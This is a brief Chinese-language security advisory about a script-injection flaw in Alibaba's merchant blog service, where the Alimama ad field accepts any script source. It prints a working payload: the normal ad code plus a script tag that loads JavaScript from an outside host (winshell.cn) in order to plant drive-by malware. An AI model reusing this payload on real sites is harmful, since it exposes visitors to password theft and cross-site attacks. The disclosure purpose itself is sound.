据国内安全组织“安全警戒线”检测,阿里巴巴网商博客出现漏洞,由于过滤不严,不法黑客或可能通过加载JS代码形式进行挂马,从而盗窃访问者相关财产密码或引发跨站攻击。具体情况如下:
文章作者:攻击者
信息来源:安全警戒线
文章备注:已经给马云发E-MAIL
在阿里巴巴网商博客中允许我们填加阿里妈妈的广告,但是他却没有过滤掉除了阿里妈妈以外的地址,从而可以使用JS挂马,简单的不能在简单的利用方法:
<script type="text/JavaScript"> alimama_pid="mm_10031051_1309365_2877941"; alimama_titlecolor="0000FF"; alimama_descolor ="000000"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="E6E6E6"; alimama_linkcolor="008000"; alimama_bottomcolor="FFFFFF"; alimama_anglesize="0"; alimama_bgpic="0"; alimama_icon="0"; alimama_sizecode="22"; alimama_width=120; alimama_height=240; alimama_type=2; </script> <script src="http://a.alimama.cn/js.js" type=text/javascript></script> <script src="http://www.winshell.cn/js.js" type=text/javascript></script>
